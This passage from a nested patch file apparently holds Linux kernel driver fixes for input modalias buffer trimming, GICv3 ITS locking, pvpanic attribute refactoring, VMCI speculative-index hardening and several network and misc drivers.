+ 		mutex_lock(&st->lock);
+diff --git a/drivers/iio/imu/inv_icm42600/inv_icm42600_accel.c b/drivers/iio/imu/inv_icm42600/inv_icm42600_accel.c
+index c3f433ad3af6b..7a0f5cfd9417f 100644
+--- a/drivers/iio/imu/inv_icm42600/inv_icm42600_accel.c
++++ b/drivers/iio/imu/inv_icm42600/inv_icm42600_accel.c
+@@ -128,10 +128,6 @@ static int inv_icm42600_accel_update_scan_mode(struct iio_dev *indio_dev,
+ 	/* update data FIFO write */
+ 	inv_icm42600_timestamp_apply_odr(ts, 0, 0, 0);
+ 	ret = inv_icm42600_buffer_set_fifo_en(st, fifo_en | st->fifo.en);
+-	if (ret)
+-		goto out_unlock;
+-
+-	ret = inv_icm42600_buffer_update_watermark(st);
+ 
+ out_unlock:
+ 	mutex_unlock(&st->lock);
+diff --git a/drivers/iio/imu/inv_icm42600/inv_icm42600_gyro.c b/drivers/iio/imu/inv_icm42600/inv_icm42600_gyro.c
+index 9d94a8518e3ca..4fb796e11486f 100644
+--- a/drivers/iio/imu/inv_icm42600/inv_icm42600_gyro.c
++++ b/drivers/iio/imu/inv_icm42600/inv_icm42600_gyro.c
+@@ -128,10 +128,6 @@ static int inv_icm42600_gyro_update_scan_mode(struct iio_dev *indio_dev,
+ 	/* update data FIFO write */
+ 	inv_icm42600_timestamp_apply_odr(ts, 0, 0, 0);
+ 	ret = inv_icm42600_buffer_set_fifo_en(st, fifo_en | st->fifo.en);
+-	if (ret)
+-		goto out_unlock;
+-
+-	ret = inv_icm42600_buffer_update_watermark(st);
+ 
+ out_unlock:
+ 	mutex_unlock(&st->lock);
+diff --git a/drivers/input/input.c b/drivers/input/input.c
+index 8b6a922f84702..78be582b5766d 100644
+--- a/drivers/input/input.c
++++ b/drivers/input/input.c
+@@ -1374,19 +1374,19 @@ static int input_print_modalias_bits(char *buf, int size,
+ 				     char name, unsigned long *bm,
+ 				     unsigned int min_bit, unsigned int max_bit)
+ {
+-	int len = 0, i;
++	int bit = min_bit;
++	int len = 0;
+ 
+ 	len += snprintf(buf, max(size, 0), "%c", name);
+-	for (i = min_bit; i < max_bit; i++)
+-		if (bm[BIT_WORD(i)] & BIT_MASK(i))
+-			len += snprintf(buf + len, max(size - len, 0), "%X,", i);
++	for_each_set_bit_from(bit, bm, max_bit)
++		len += snprintf(buf + len, max(size - len, 0), "%X,", bit);
+ 	return len;
+ }
+ 
+-static int input_print_modalias(char *buf, int size, struct input_dev *id,
+-				int add_cr)
++static int input_print_modalias_parts(char *buf, int size, int full_len,
++				      struct input_dev *id)
+ {
+-	int len;
++	int len, klen, remainder, space;
+ 
+ 	len = snprintf(buf, max(size, 0),
+ 		       "input:b%04Xv%04Xp%04Xe%04X-",
+@@ -1395,8 +1395,48 @@ static int input_print_modalias(char *buf, int size, struct input_dev *id,
+ 
+ 	len += input_print_modalias_bits(buf + len, size - len,
+ 				'e', id->evbit, 0, EV_MAX);
+-	len += input_print_modalias_bits(buf + len, size - len,
++
++	/*
++	 * Calculate the remaining space in the buffer making sure we
++	 * have place for the terminating 0.
++	 */
++	space = max(size - (len + 1), 0);
++
++	klen = input_print_modalias_bits(buf + len, size - len,
+ 				'k', id->keybit, KEY_MIN_INTERESTING, KEY_MAX);
++	len += klen;
++
++	/*
++	 * If we have more data than we can fit in the buffer, check
++	 * if we can trim key data to fit in the rest. We will indicate
++	 * that key data is incomplete by adding "+" sign at the end, like
++	 * this: * "k1,2,3,45,+,".
++	 *
++	 * Note that we shortest key info (if present) is "k+," so we
++	 * can only try to trim if key data is longer than that.
++	 */
++	if (full_len && size < full_len + 1 && klen > 3) {
++		remainder = full_len - len;
++		/*
++		 * We can only trim if we have space for the remainder
++		 * and also for at least "k+," which is 3 more characters.
++		 */
++		if (remainder <= space - 3) {
++			/*
++			 * We are guaranteed to have 'k' in the buffer, so
++			 * we need at least 3 additional bytes for storing
++			 * "+," in addition to the remainder.
++			 */
++			for (int i = size - 1 - remainder - 3; i >= 0; i--) {
++				if (buf[i] == 'k' || buf[i] == ',') {
++					strcpy(buf + i + 1, "+,");
++					len = i + 3; /* Not counting '\0' */
++					break;
++				}
++			}
++		}
++	}
++
+ 	len += input_print_modalias_bits(buf + len, size - len,
+ 				'r', id->relbit, 0, REL_MAX);
+ 	len += input_print_modalias_bits(buf + len, size - len,
+@@ -1412,12 +1452,25 @@ static int input_print_modalias(char *buf, int size, struct input_dev *id,
+ 	len += input_print_modalias_bits(buf + len, size - len,
+ 				'w', id->swbit, 0, SW_MAX);
+ 
+-	if (add_cr)
+-		len += snprintf(buf + len, max(size - len, 0), "\n");
+-
+ 	return len;
+ }
+ 
++static int input_print_modalias(char *buf, int size, struct input_dev *id)
++{
++	int full_len;
++
++	/*
++	 * Printing is done in 2 passes: first one figures out total length
++	 * needed for the modalias string, second one will try to trim key
++	 * data in case when buffer is too small for the entire modalias.
++	 * If the buffer is too small regardless, it will fill as much as it
++	 * can (without trimming key data) into the buffer and leave it to
++	 * the caller to figure out what to do with the result.
++	 */
++	full_len = input_print_modalias_parts(NULL, 0, 0, id);
++	return input_print_modalias_parts(buf, size, full_len, id);
++}
++
+ static ssize_t input_dev_show_modalias(struct device *dev,
+ 				       struct device_attribute *attr,
+ 				       char *buf)
+@@ -1425,7 +1478,9 @@ static ssize_t input_dev_show_modalias(struct device *dev,
+ 	struct input_dev *id = to_input_dev(dev);
+ 	ssize_t len;
+ 
+-	len = input_print_modalias(buf, PAGE_SIZE, id, 1);
++	len = input_print_modalias(buf, PAGE_SIZE, id);
++	if (len < PAGE_SIZE - 2)
++		len += snprintf(buf + len, PAGE_SIZE - len, "\n");
+ 
+ 	return min_t(int, len, PAGE_SIZE);
+ }
+@@ -1637,6 +1692,23 @@ static int input_add_uevent_bm_var(struct kobj_uevent_env *env,
+ 	return 0;
+ }
+ 
++/*
++ * This is a pretty gross hack. When building uevent data the driver core
++ * may try adding more environment variables to kobj_uevent_env without
++ * telling us, so we have no idea how much of the buffer we can use to
++ * avoid overflows/-ENOMEM elsewhere. To work around this let's artificially
++ * reduce amount of memory we will use for the modalias environment variable.
++ *
++ * The potential additions are:
++ *
++ * SEQNUM=18446744073709551615 - (%llu - 28 bytes)
++ * HOME=/ (6 bytes)
++ * PATH=/sbin:/bin:/usr/sbin:/usr/bin (34 bytes)
++ *
++ * 68 bytes total. Allow extra buffer - 96 bytes
++ */
++#define UEVENT_ENV_EXTRA_LEN	96
++
+ static int input_add_uevent_modalias_var(struct kobj_uevent_env *env,
+ 					 struct input_dev *dev)
+ {
+@@ -1646,9 +1718,11 @@ static int input_add_uevent_modalias_var(struct kobj_uevent_env *env,
+ 		return -ENOMEM;
+ 
+ 	len = input_print_modalias(&env->buf[env->buflen - 1],
+-				   sizeof(env->buf) - env->buflen,
+-				   dev, 0);
+-	if (len >= (sizeof(env->buf) - env->buflen))
++				   (int)sizeof(env->buf) - env->buflen -
++					UEVENT_ENV_EXTRA_LEN,
++				   dev);
++	if (len >= ((int)sizeof(env->buf) - env->buflen -
++					UEVENT_ENV_EXTRA_LEN))
+ 		return -ENOMEM;
+ 
+ 	env->buflen += len;
+diff --git a/drivers/iommu/amd/init.c b/drivers/iommu/amd/init.c
+index cc94ac6662339..c9598c506ff94 100644
+--- a/drivers/iommu/amd/init.c
++++ b/drivers/iommu/amd/init.c
+@@ -1655,8 +1655,17 @@ static void __init free_pci_segments(void)
+ 	}
+ }
+ 
++static void __init free_sysfs(struct amd_iommu *iommu)
++{
++	if (iommu->iommu.dev) {
++		iommu_device_unregister(&iommu->iommu);
++		iommu_device_sysfs_remove(&iommu->iommu);
++	}
++}
++
+ static void __init free_iommu_one(struct amd_iommu *iommu)
+ {
++	free_sysfs(iommu);
+ 	free_cwwb_sem(iommu);
+ 	free_command_buffer(iommu);
+ 	free_event_buffer(iommu);
+diff --git a/drivers/irqchip/irq-gic-v3-its.c b/drivers/irqchip/irq-gic-v3-its.c
+index f9ab5cfc9b947..3620bdb5200f2 100644
+--- a/drivers/irqchip/irq-gic-v3-its.c
++++ b/drivers/irqchip/irq-gic-v3-its.c
+@@ -1837,28 +1837,22 @@ static int its_vlpi_map(struct irq_data *d, struct its_cmd_info *info)
+ {
+ 	struct its_device *its_dev = irq_data_get_irq_chip_data(d);
+ 	u32 event = its_get_event_id(d);
+-	int ret = 0;
+ 
+ 	if (!info->map)
+ 		return -EINVAL;
+ 
+-	raw_spin_lock(&its_dev->event_map.vlpi_lock);
+-
+ 	if (!its_dev->event_map.vm) {
+ 		struct its_vlpi_map *maps;
+ 
+ 		maps = kcalloc(its_dev->event_map.nr_lpis, sizeof(*maps),
+ 			       GFP_ATOMIC);
+-		if (!maps) {
+-			ret = -ENOMEM;
+-			goto out;
+-		}
++		if (!maps)
++			return -ENOMEM;
+ 
+ 		its_dev->event_map.vm = info->map->vm;
+ 		its_dev->event_map.vlpi_maps = maps;
+ 	} else if (its_dev->event_map.vm != info->map->vm) {
+-		ret = -EINVAL;
+-		goto out;
++		return -EINVAL;
+ 	}
+ 
+ 	/* Get our private copy of the mapping information */
+@@ -1890,46 +1884,32 @@ static int its_vlpi_map(struct irq_data *d, struct its_cmd_info *info)
+ 		its_dev->event_map.nr_vlpis++;
+ 	}
+ 
+-out:
+-	raw_spin_unlock(&its_dev->event_map.vlpi_lock);
+-	return ret;
++	return 0;
+ }
+ 
+ static int its_vlpi_get(struct irq_data *d, struct its_cmd_info *info)
+ {
+ 	struct its_device *its_dev = irq_data_get_irq_chip_data(d);
+ 	struct its_vlpi_map *map;
+-	int ret = 0;
+-
+-	raw_spin_lock(&its_dev->event_map.vlpi_lock);
+ 
+ 	map = get_vlpi_map(d);
+ 
+-	if (!its_dev->event_map.vm || !map) {
+-		ret = -EINVAL;
+-		goto out;
+-	}
++	if (!its_dev->event_map.vm || !map)
++		return -EINVAL;
+ 
+ 	/* Copy our mapping information to the incoming request */
+ 	*info->map = *map;
+ 
+-out:
+-	raw_spin_unlock(&its_dev->event_map.vlpi_lock);
+-	return ret;
++	return 0;
+ }
+ 
+ static int its_vlpi_unmap(struct irq_data *d)
+ {
+ 	struct its_device *its_dev = irq_data_get_irq_chip_data(d);
+ 	u32 event = its_get_event_id(d);
+-	int ret = 0;
+-
+-	raw_spin_lock(&its_dev->event_map.vlpi_lock);
+ 
+-	if (!its_dev->event_map.vm || !irqd_is_forwarded_to_vcpu(d)) {
+-		ret = -EINVAL;
+-		goto out;
+-	}
++	if (!its_dev->event_map.vm || !irqd_is_forwarded_to_vcpu(d))
++		return -EINVAL;
+ 
+ 	/* Drop the virtual mapping */
+ 	its_send_discard(its_dev, event);
+@@ -1953,9 +1933,7 @@ static int its_vlpi_unmap(struct irq_data *d)
+ 		kfree(its_dev->event_map.vlpi_maps);
+ 	}
+ 
+-out:
+-	raw_spin_unlock(&its_dev->event_map.vlpi_lock);
+-	return ret;
++	return 0;
+ }
+ 
+ static int its_vlpi_prop_update(struct irq_data *d, struct its_cmd_info *info)
+@@ -1983,6 +1961,8 @@ static int its_irq_set_vcpu_affinity(struct irq_data *d, void *vcpu_info)
+ 	if (!is_v4(its_dev->its))
+ 		return -EINVAL;
+ 
++	guard(raw_spinlock_irq)(&its_dev->event_map.vlpi_lock);
++
+ 	/* Unmap request? */
+ 	if (!info)
+ 		return its_vlpi_unmap(d);
+diff --git a/drivers/misc/mchp_pci1xxxx/mchp_pci1xxxx_gp.c b/drivers/misc/mchp_pci1xxxx/mchp_pci1xxxx_gp.c
+index 32af2b14ff344..34c9be437432a 100644
+--- a/drivers/misc/mchp_pci1xxxx/mchp_pci1xxxx_gp.c
++++ b/drivers/misc/mchp_pci1xxxx/mchp_pci1xxxx_gp.c
+@@ -69,8 +69,10 @@ static int gp_aux_bus_probe(struct pci_dev *pdev, const struct pci_device_id *id
+ 
+ 	aux_bus->aux_device_wrapper[1] = kzalloc(sizeof(*aux_bus->aux_device_wrapper[1]),
+ 						 GFP_KERNEL);
+-	if (!aux_bus->aux_device_wrapper[1])
+-		return -ENOMEM;
++	if (!aux_bus->aux_device_wrapper[1]) {
++		retval =  -ENOMEM;
++		goto err_aux_dev_add_0;
++	}
+ 
+ 	retval = ida_alloc(&gp_client_ida, GFP_KERNEL);
+ 	if (retval < 0)
+@@ -111,6 +113,7 @@ static int gp_aux_bus_probe(struct pci_dev *pdev, const struct pci_device_id *id
+ 
+ err_aux_dev_add_1:
+ 	auxiliary_device_uninit(&aux_bus->aux_device_wrapper[1]->aux_dev);
++	goto err_aux_dev_add_0;
+ 
+ err_aux_dev_init_1:
+ 	ida_free(&gp_client_ida, aux_bus->aux_device_wrapper[1]->aux_dev.id);
+@@ -120,6 +123,7 @@ static int gp_aux_bus_probe(struct pci_dev *pdev, const struct pci_device_id *id
+ 
+ err_aux_dev_add_0:
+ 	auxiliary_device_uninit(&aux_bus->aux_device_wrapper[0]->aux_dev);
++	goto err_ret;
+ 
+ err_aux_dev_init_0:
+ 	ida_free(&gp_client_ida, aux_bus->aux_device_wrapper[0]->aux_dev.id);
+@@ -127,6 +131,7 @@ static int gp_aux_bus_probe(struct pci_dev *pdev, const struct pci_device_id *id
+ err_ida_alloc_0:
+ 	kfree(aux_bus->aux_device_wrapper[0]);
+ 
++err_ret:
+ 	return retval;
+ }
+ 
+diff --git a/drivers/misc/mei/pci-me.c b/drivers/misc/mei/pci-me.c
+index a4bdc41284582..dd4d92fa44c65 100644
+--- a/drivers/misc/mei/pci-me.c
++++ b/drivers/misc/mei/pci-me.c
+@@ -394,8 +394,10 @@ static int mei_me_pci_resume(struct device *device)
+ 	}
+ 
+ 	err = mei_restart(dev);
+-	if (err)
++	if (err) {
++		free_irq(pdev->irq, dev);
+ 		return err;
++	}
+ 
+ 	/* Start timer if stopped in suspend */
+ 	schedule_delayed_work(&dev->timer_work, HZ);
+diff --git a/drivers/misc/pvpanic/pvpanic-mmio.c b/drivers/misc/pvpanic/pvpanic-mmio.c
+index eb97167c03fb4..9715798acce3d 100644
+--- a/drivers/misc/pvpanic/pvpanic-mmio.c
++++ b/drivers/misc/pvpanic/pvpanic-mmio.c
+@@ -24,52 +24,9 @@ MODULE_AUTHOR("Hu Tao <hutao@cn.fujitsu.com>");
+ MODULE_DESCRIPTION("pvpanic-mmio device driver");
+ MODULE_LICENSE("GPL");
+ 
+-static ssize_t capability_show(struct device *dev, struct device_attribute *attr, char *buf)
+-{
+-	struct pvpanic_instance *pi = dev_get_drvdata(dev);
+-
+-	return sysfs_emit(buf, "%x\n", pi->capability);
+-}
+-static DEVICE_ATTR_RO(capability);
+-
+-static ssize_t events_show(struct device *dev, struct device_attribute *attr, char *buf)
+-{
+-	struct pvpanic_instance *pi = dev_get_drvdata(dev);
+-
+-	return sysfs_emit(buf, "%x\n", pi->events);
+-}
+-
+-static ssize_t events_store(struct device *dev, struct device_attribute *attr,
+-			    const char *buf, size_t count)
+-{
+-	struct pvpanic_instance *pi = dev_get_drvdata(dev);
+-	unsigned int tmp;
+-	int err;
+-
+-	err = kstrtouint(buf, 16, &tmp);
+-	if (err)
+-		return err;
+-
+-	if ((tmp & pi->capability) != tmp)
+-		return -EINVAL;
+-
+-	pi->events = tmp;
+-
+-	return count;
+-}
+-static DEVICE_ATTR_RW(events);
+-
+-static struct attribute *pvpanic_mmio_dev_attrs[] = {
+-	&dev_attr_capability.attr,
+-	&dev_attr_events.attr,
+-	NULL
+-};
+-ATTRIBUTE_GROUPS(pvpanic_mmio_dev);
+-
+ static int pvpanic_mmio_probe(struct platform_device *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+-	struct pvpanic_instance *pi;
+ 	struct resource *res;
+ 	void __iomem *base;
+ 
+@@ -92,18 +49,7 @@ static int pvpanic_mmio_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
+-	pi = devm_kmalloc(dev, sizeof(*pi), GFP_KERNEL);
+-	if (!pi)
+-		return -ENOMEM;
+-
+-	pi->base = base;
+-	pi->capability = PVPANIC_PANICKED | PVPANIC_CRASH_LOADED;
+-
+-	/* initialize capability by RDPT */
+-	pi->capability &= ioread8(base);
+-	pi->events = pi->capability;
+-
+-	return devm_pvpanic_probe(dev, pi);
++	return devm_pvpanic_probe(dev, base);
+ }
+ 
+ static const struct of_device_id pvpanic_mmio_match[] = {
+@@ -123,7 +69,7 @@ static struct platform_driver pvpanic_mmio_driver = {
+ 		.name = "pvpanic-mmio",
+ 		.of_match_table = pvpanic_mmio_match,
+ 		.acpi_match_table = pvpanic_device_ids,
+-		.dev_groups = pvpanic_mmio_dev_groups,
++		.dev_groups = pvpanic_dev_groups,
+ 	},
+ 	.probe = pvpanic_mmio_probe,
+ };
+diff --git a/drivers/misc/pvpanic/pvpanic-pci.c b/drivers/misc/pvpanic/pvpanic-pci.c
+index 07eddb5ea30fa..2494725dfacfa 100644
+--- a/drivers/misc/pvpanic/pvpanic-pci.c
++++ b/drivers/misc/pvpanic/pvpanic-pci.c
+@@ -22,51 +22,8 @@ MODULE_AUTHOR("Mihai Carabas <mihai.carabas@oracle.com>");
+ MODULE_DESCRIPTION("pvpanic device driver");
+ MODULE_LICENSE("GPL");
+ 
+-static ssize_t capability_show(struct device *dev, struct device_attribute *attr, char *buf)
+-{
+-	struct pvpanic_instance *pi = dev_get_drvdata(dev);
+-
+-	return sysfs_emit(buf, "%x\n", pi->capability);
+-}
+-static DEVICE_ATTR_RO(capability);
+-
+-static ssize_t events_show(struct device *dev, struct device_attribute *attr, char *buf)
+-{
+-	struct pvpanic_instance *pi = dev_get_drvdata(dev);
+-
+-	return sysfs_emit(buf, "%x\n", pi->events);
+-}
+-
+-static ssize_t events_store(struct device *dev, struct device_attribute *attr,
+-			    const char *buf, size_t count)
+-{
+-	struct pvpanic_instance *pi = dev_get_drvdata(dev);
+-	unsigned int tmp;
+-	int err;
+-
+-	err = kstrtouint(buf, 16, &tmp);
+-	if (err)
+-		return err;
+-
+-	if ((tmp & pi->capability) != tmp)
+-		return -EINVAL;
+-
+-	pi->events = tmp;
+-
+-	return count;
+-}
+-static DEVICE_ATTR_RW(events);
+-
+-static struct attribute *pvpanic_pci_dev_attrs[] = {
+-	&dev_attr_capability.attr,
+-	&dev_attr_events.attr,
+-	NULL
+-};
+-ATTRIBUTE_GROUPS(pvpanic_pci_dev);
+-
+ static int pvpanic_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ {
+-	struct pvpanic_instance *pi;
+ 	void __iomem *base;
+ 	int ret;
+ 
+@@ -78,18 +35,7 @@ static int pvpanic_pci_probe(struct pci_dev *pdev, const struct pci_device_id *e
+ 	if (!base)
+ 		return -ENOMEM;
+ 
+-	pi = devm_kmalloc(&pdev->dev, sizeof(*pi), GFP_KERNEL);
+-	if (!pi)
+-		return -ENOMEM;
+-
+-	pi->base = base;
+-	pi->capability = PVPANIC_PANICKED | PVPANIC_CRASH_LOADED;
+-
+-	/* initlize capability by RDPT */
+-	pi->capability &= ioread8(base);
+-	pi->events = pi->capability;
+-
+-	return devm_pvpanic_probe(&pdev->dev, pi);
++	return devm_pvpanic_probe(&pdev->dev, base);
+ }
+ 
+ static const struct pci_device_id pvpanic_pci_id_tbl[]  = {
+@@ -102,8 +48,6 @@ static struct pci_driver pvpanic_pci_driver = {
+ 	.name =         "pvpanic-pci",
+ 	.id_table =     pvpanic_pci_id_tbl,
+ 	.probe =        pvpanic_pci_probe,
+-	.driver = {
+-		.dev_groups = pvpanic_pci_dev_groups,
+-	},
++	.dev_groups =   pvpanic_dev_groups,
+ };
+ module_pci_driver(pvpanic_pci_driver);
+diff --git a/drivers/misc/pvpanic/pvpanic.c b/drivers/misc/pvpanic/pvpanic.c
+index 049a120063489..305b367e0ce34 100644
+--- a/drivers/misc/pvpanic/pvpanic.c
++++ b/drivers/misc/pvpanic/pvpanic.c
+@@ -7,6 +7,7 @@
+  *  Copyright (C) 2021 Oracle.
+  */
+ 
++#include <linux/device.h>
+ #include <linux/io.h>
+ #include <linux/kernel.h>
+ #include <linux/kexec.h>
+@@ -26,6 +27,13 @@ MODULE_AUTHOR("Mihai Carabas <mihai.carabas@oracle.com>");
+ MODULE_DESCRIPTION("pvpanic device driver");
+ MODULE_LICENSE("GPL");
+ 
++struct pvpanic_instance {
++	void __iomem *base;
++	unsigned int capability;
++	unsigned int events;
++	struct list_head list;
++};
++
+ static struct list_head pvpanic_list;
+ static spinlock_t pvpanic_lock;
+ 
+@@ -81,11 +89,75 @@ static void pvpanic_remove(void *param)
+ 	spin_unlock(&pvpanic_lock);
+ }
+ 
+-int devm_pvpanic_probe(struct device *dev, struct pvpanic_instance *pi)
++static ssize_t capability_show(struct device *dev, struct device_attribute *attr, char *buf)
++{
++	struct pvpanic_instance *pi = dev_get_drvdata(dev);
++
++	return sysfs_emit(buf, "%x\n", pi->capability);
++}
++static DEVICE_ATTR_RO(capability);
++
++static ssize_t events_show(struct device *dev, struct device_attribute *attr, char *buf)
++{
++	struct pvpanic_instance *pi = dev_get_drvdata(dev);
++
++	return sysfs_emit(buf, "%x\n", pi->events);
++}
++
++static ssize_t events_store(struct device *dev, struct device_attribute *attr,
++			    const char *buf, size_t count)
++{
++	struct pvpanic_instance *pi = dev_get_drvdata(dev);
++	unsigned int tmp;
++	int err;
++
++	err = kstrtouint(buf, 16, &tmp);
++	if (err)
++		return err;
++
++	if ((tmp & pi->capability) != tmp)
++		return -EINVAL;
++
++	pi->events = tmp;
++
++	return count;
++}
++static DEVICE_ATTR_RW(events);
++
++static struct attribute *pvpanic_dev_attrs[] = {
++	&dev_attr_capability.attr,
++	&dev_attr_events.attr,
++	NULL
++};
++
++static const struct attribute_group pvpanic_dev_group = {
++	.attrs = pvpanic_dev_attrs,
++};
++
++const struct attribute_group *pvpanic_dev_groups[] = {
++	&pvpanic_dev_group,
++	NULL
++};
++EXPORT_SYMBOL_GPL(pvpanic_dev_groups);
++
++int devm_pvpanic_probe(struct device *dev, void __iomem *base)
+ {
+-	if (!pi || !pi->base)
++	struct pvpanic_instance *pi;
++
++	if (!base)
+ 		return -EINVAL;
+ 
++	pi = devm_kmalloc(dev, sizeof(*pi), GFP_KERNEL);
++	if (!pi)
++		return -ENOMEM;
++
++	pi->base = base;
++	pi->capability = PVPANIC_PANICKED | PVPANIC_CRASH_LOADED;
++
++	/* initlize capability by RDPT */
++	pi->capability &= ioread8(base);
++	pi->events = pi->capability;
++
+ 	spin_lock(&pvpanic_lock);
+ 	list_add(&pi->list, &pvpanic_list);
+ 	spin_unlock(&pvpanic_lock);
+diff --git a/drivers/misc/pvpanic/pvpanic.h b/drivers/misc/pvpanic/pvpanic.h
+index 4935459517548..46ffb10438adf 100644
+--- a/drivers/misc/pvpanic/pvpanic.h
++++ b/drivers/misc/pvpanic/pvpanic.h
+@@ -8,13 +8,7 @@
+ #ifndef PVPANIC_H_
+ #define PVPANIC_H_
+ 
+-struct pvpanic_instance {
+-	void __iomem *base;
+-	unsigned int capability;
+-	unsigned int events;
+-	struct list_head list;
+-};
+-
+-int devm_pvpanic_probe(struct device *dev, struct pvpanic_instance *pi);
++int devm_pvpanic_probe(struct device *dev, void __iomem *base);
++extern const struct attribute_group *pvpanic_dev_groups[];
+ 
+ #endif /* PVPANIC_H_ */
+diff --git a/drivers/misc/vmw_vmci/vmci_event.c b/drivers/misc/vmw_vmci/vmci_event.c
+index 2100297c94ad0..a1205bce0b7ee 100644
+--- a/drivers/misc/vmw_vmci/vmci_event.c
++++ b/drivers/misc/vmw_vmci/vmci_event.c
+@@ -9,6 +9,7 @@
+ #include <linux/vmw_vmci_api.h>
+ #include <linux/list.h>
+ #include <linux/module.h>
++#include <linux/nospec.h>
+ #include <linux/sched.h>
+ #include <linux/slab.h>
+ #include <linux/rculist.h>
+@@ -86,9 +87,12 @@ static void event_deliver(struct vmci_event_msg *event_msg)
+ {
+ 	struct vmci_subscription *cur;
+ 	struct list_head *subscriber_list;
++	u32 sanitized_event, max_vmci_event;
+ 
+ 	rcu_read_lock();
+-	subscriber_list = &subscriber_array[event_msg->event_data.event];
++	max_vmci_event = ARRAY_SIZE(subscriber_array);
++	sanitized_event = array_index_nospec(event_msg->event_data.event, max_vmci_event);
++	subscriber_list = &subscriber_array[sanitized_event];
+ 	list_for_each_entry_rcu(cur, subscriber_list, node) {
+ 		cur->callback(cur->id, &event_msg->event_data,
+ 			      cur->callback_data);
+diff --git a/drivers/mmc/host/davinci_mmc.c b/drivers/mmc/host/davinci_mmc.c
+index 7138dfa065bfa..e89a97b415154 100644
+--- a/drivers/mmc/host/davinci_mmc.c
++++ b/drivers/mmc/host/davinci_mmc.c
+@@ -1345,7 +1345,7 @@ static int davinci_mmcsd_probe(struct platform_device *pdev)
+ 	return ret;
+ }
+ 
+-static int __exit davinci_mmcsd_remove(struct platform_device *pdev)
++static int davinci_mmcsd_remove(struct platform_device *pdev)
+ {
+ 	struct mmc_davinci_host *host = platform_get_drvdata(pdev);
+ 
+@@ -1402,7 +1402,7 @@ static struct platform_driver davinci_mmcsd_driver = {
+ 		.of_match_table = davinci_mmc_dt_ids,
+ 	},
+ 	.probe		= davinci_mmcsd_probe,
+-	.remove		= __exit_p(davinci_mmcsd_remove),
++	.remove		= davinci_mmcsd_remove,
+ 	.id_table	= davinci_mmc_devtype,
+ };
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_hwrm.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_hwrm.c
+index 132442f16fe67..7a4e08b5a8c1b 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_hwrm.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_hwrm.c
+@@ -678,7 +678,7 @@ static int __hwrm_send(struct bnxt *bp, struct bnxt_hwrm_ctx *ctx)
+ 			    req_type);
+ 	else if (rc && rc != HWRM_ERR_CODE_PF_UNAVAILABLE)
+ 		hwrm_err(bp, ctx, "hwrm req_type 0x%x seq id 0x%x error 0x%x\n",
+-			 req_type, token->seq_id, rc);
++			 req_type, le16_to_cpu(ctx->req->seq_id), rc);
+ 	rc = __hwrm_to_stderr(rc);
+ exit:
+ 	if (token)
+diff --git a/drivers/net/ethernet/cavium/liquidio/lio_vf_rep.c b/drivers/net/ethernet/cavium/liquidio/lio_vf_rep.c
+index 600de587d7a98..e70b9ccca380e 100644
+--- a/drivers/net/ethernet/cavium/liquidio/lio_vf_rep.c
++++ b/drivers/net/ethernet/cavium/liquidio/lio_vf_rep.c
+@@ -272,13 +272,12 @@ lio_vf_rep_copy_packet(struct octeon_device *oct,
+ 				pg_info->page_offset;
+ 			memcpy(skb->data, va, MIN_SKB_SIZE);
+ 			skb_put(skb, MIN_SKB_SIZE);
++			skb_add_rx_frag(skb, skb_shinfo(skb)->nr_frags,
++					pg_info->page,
++					pg_info->page_offset + MIN_SKB_SIZE,
++					len - MIN_SKB_SIZE,
++					LIO_RXBUFFER_SZ);
+ 		}
+-
+-		skb_add_rx_frag(skb, skb_shinfo(skb)->nr_frags,
+-				pg_info->page,
+-				pg_info->page_offset + MIN_SKB_SIZE,
+-				len - MIN_SKB_SIZE,
+-				LIO_RXBUFFER_SZ);
+ 	} else {
+ 		struct octeon_skb_page_info *pg_info =
+ 			((struct octeon_skb_page_info *)(skb->cb));
+diff --git a/drivers/net/ethernet/google/gve/gve_rx_dqo.c b/drivers/net/ethernet/google/gve/gve_rx_dqo.c
+index a9409e3721ad7..0a36b284de10e 100644
+--- a/drivers/net/ethernet/google/gve/gve_rx_dqo.c
++++ b/drivers/net/ethernet/google/gve/gve_rx_dqo.c
+@@ -465,11 +465,13 @@ static void gve_rx_skb_hash(struct sk_buff *skb,
+ 	skb_set_hash(skb, le32_to_cpu(compl_desc->hash), hash_type);
+ }
+ 
+-static void gve_rx_free_skb(struct gve_rx_ring *rx)
++static void gve_rx_free_skb(struct napi_struct *napi, struct gve_rx_ring *rx)
+ {
+ 	if (!rx->ctx.skb_head)
+ 		return;
+ 
++	if (rx->ctx.skb_head == napi->skb)
++		napi->skb = NULL;
+ 	dev_kfree_skb_any(rx->ctx.skb_head);
+ 	rx->ctx.skb_head = NULL;
+ 	rx->ctx.skb_tail = NULL;
+@@ -693,7 +695,7 @@ int gve_rx_poll_dqo(struct gve_notify_block *block, int budget)
+ 
+ 		err = gve_rx_dqo(napi, rx, compl_desc, rx->q_num);
+ 		if (err < 0) {
+-			gve_rx_free_skb(rx);
++			gve_rx_free_skb(napi, rx);
+ 			u64_stats_update_begin(&rx->statss);
+ 			if (err == -ENOMEM)
+ 				rx->rx_skb_alloc_fail++;
+@@ -736,7 +738,7 @@ int gve_rx_poll_dqo(struct gve_notify_block *block, int budget)
+ 
+ 		/* gve_rx_complete_skb() will consume skb if successful */
+ 		if (gve_rx_complete_skb(rx, napi, compl_desc, feat) != 0) {
+-			gve_rx_free_skb(rx);
++			gve_rx_free_skb(napi, rx);
+ 			u64_stats_update_begin(&rx->statss);
+ 			rx->rx_desc_err_dropped_pkt++;
+ 			u64_stats_update_end(&rx->statss);
+diff --git a/drivers/net/ethernet/google/gve/gve_tx_dqo.c b/drivers/net/ethernet/google/gve/gve_tx_dqo.c
+index e84e944d751d2..5147fb37929e0 100644
+--- a/drivers/net/ethernet/google/gve/gve_tx_dqo.c
++++ b/drivers/net/ethernet/google/gve/gve_tx_dqo.c
+@@ -370,28 +370,18 @@ static int gve_prep_tso(struct sk_buff *skb)
+ 	if (unlikely(skb_shinfo(skb)->gso_size < GVE_TX_MIN_TSO_MSS_DQO))
+ 		return -1;
+ 
++	if (!(skb_shinfo(skb)->gso_type & (SKB_GSO_TCPV4 | SKB_GSO_TCPV6)))
++		return -EINVAL;
++
+ 	/* Needed because we will modify header. */
+ 	err = skb_cow_head(skb, 0);
+ 	if (err < 0)
+ 		return err;
+ 
